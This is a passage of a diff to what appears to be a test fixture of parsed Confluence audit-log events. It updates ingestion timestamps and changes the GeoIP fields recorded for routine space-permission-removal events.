@@ -8086,7 +7600,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222525013Z", + "ingested": "2021-12-14T14:34:31.513235889Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.266Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-users\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"EXPORTSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -8159,20 +7673,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -8180,7 +7688,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222526892Z", + "ingested": "2021-12-14T14:34:31.513236287Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.262Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"EXPORTSPACE\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"from\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -8253,20 +7761,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -8274,7 +7776,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222528780Z", + "ingested": "2021-12-14T14:34:31.513236676Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.258Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"EDITBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -8340,20 +7842,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -8361,7 +7857,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222530663Z", + "ingested": "2021-12-14T14:34:31.513237072Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.254Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -8434,20 +7930,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -8455,7 +7945,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222532545Z", + "ingested": "2021-12-14T14:34:31.513237512Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.250Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-users\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -8528,20 +8018,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -8549,7 +8033,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222534474Z", + "ingested": "2021-12-14T14:34:31.513237898Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.246Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVEATTACHMENT\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"from\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -8622,20 +8106,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -8643,7 +8121,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222536371Z", + "ingested": "2021-12-14T14:34:31.513238292Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.242Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"EXPORTPAGE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -8709,20 +8187,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -8730,7 +8202,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222538242Z", + "ingested": "2021-12-14T14:34:31.513238682Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.238Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"EDITBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -8803,20 +8275,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -8824,7 +8290,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222540141Z", + "ingested": "2021-12-14T14:34:31.513239064Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.234Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-users\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"EDITBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -8897,20 +8363,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -8918,7 +8378,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222542013Z", + "ingested": "2021-12-14T14:34:31.513239467Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.230Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"EDITBLOG\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"from\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -8991,20 +8451,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -9012,7 +8466,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222543907Z", + "ingested": "2021-12-14T14:34:31.513239902Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.225Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"CREATEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -9078,20 +8532,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -9099,7 +8547,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222545801Z", + "ingested": "2021-12-14T14:34:31.513240294Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.221Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVEBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -9172,20 +8620,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -9193,7 +8635,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222547675Z", + "ingested": "2021-12-14T14:34:31.513240700Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.217Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-users\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVEBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -9266,20 +8708,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -9287,7 +8723,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222549556Z", + "ingested": "2021-12-14T14:34:31.513241096Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.212Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVEBLOG\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"from\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -9360,20 +8796,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -9381,7 +8811,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222551441Z", + "ingested": "2021-12-14T14:34:31.513241509Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.208Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -9447,20 +8877,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -9468,7 +8892,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222553328Z", + "ingested": "2021-12-14T14:34:31.513241956Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.204Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"CREATEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -9541,20 +8965,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -9562,7 +8980,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222555204Z", + "ingested": "2021-12-14T14:34:31.513242393Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.200Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission 